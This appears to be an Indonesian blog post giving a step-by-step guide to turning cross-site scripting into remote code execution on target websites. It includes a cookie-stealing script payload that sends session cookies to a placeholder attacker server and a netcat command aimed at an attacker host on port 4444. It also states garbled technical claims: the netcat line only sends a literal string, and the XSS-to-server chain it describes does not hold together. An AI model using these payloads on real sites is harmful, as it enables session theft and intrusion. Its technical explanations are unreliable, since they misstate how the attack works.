XSS To RCE Exploits


XSS to RCE adalah singkatan dari Cross-Site Scripting to Remote Code Execution. Ini berarti, membuat script pada halaman web (biasanya berupa form atau input) untuk membawa kode yang bersifat berbahaya. Penyerang kemudian menggunakan kode ini untuk mendapatkan akses ke server target dan mengontrolnya.

Baiklah, berikut ini adalah tahapan-tahapan untuk melakukan XSS to RCE:

1. Menemukan website yang rentan terhadap serangan XSS:

Anda bisa memanfaatkan situs web yang memiliki kelemahan XSS yang dikenal. Atau Anda bisa mencoba menemukan celah dengan menggunakan teknik fuzzing terhadap form atau input yang terdapat pada halaman situs web.

2. Memasukkan payload yang mengeksploitasi celah XSS:

Selanjutnya, Anda memasukkan payload yang dirancang untuk mengeksploitasi celah XSS. Payload ini harus berisi kode JavaScript atau HTML yang berisi perintah untuk mengirimkan informasi dari server target ke server yang Anda kendalikan.

Sebagai contoh, berikut ini adalah contoh kode XSS sederhana yang akan mengirimkan informasi dari session login server target ke server penyerang:


<script> new Image().src="http://SERVER-ANDA/nama-file.php?data="+document.cookie;</script>


3. Membuat server penyerang:

Anda perlu membuat server untuk menerima informasi yang telah dikirim dari server target. Server ini bisa berupa alamat IP atau URL. Anda perlu membuat server menggunakan tools seperti Metasploit atau menyewa server cloud seperti AWS atau DigitalOcean.

4. Menjalankan perintah RCE pada server target:

Setelah Anda berhasil mengambil informasi dan memasukkannya ke server penyerang, langkah selanjutnya adalah menjalankan perintah RCE pada server target. Ini harus dilakukan dengan hati-hati karena dapat menyebabkan kerusakan yang serius pada sistem.

Contoh kode untuk melakukan RCE pada server target adalah:


echo "cat /etc/passwd" | nc SERVER-PENYERANG 4444


Dalam contoh kode di atas, "cat /etc/passwd" adalah perintah yang ingin Anda jalankan pada server target dan "nc SERVER-PENYERANG 4444" adalah perintah untuk mengirim keluaran dari perintah tersebut ke server penyerang.

Jadi, itulah langkah-langkah untuk melakukan XSS to RCE. selalu lakukan tindakan ini dengan bijaksana dan bertanggung jawab.

0 Komentar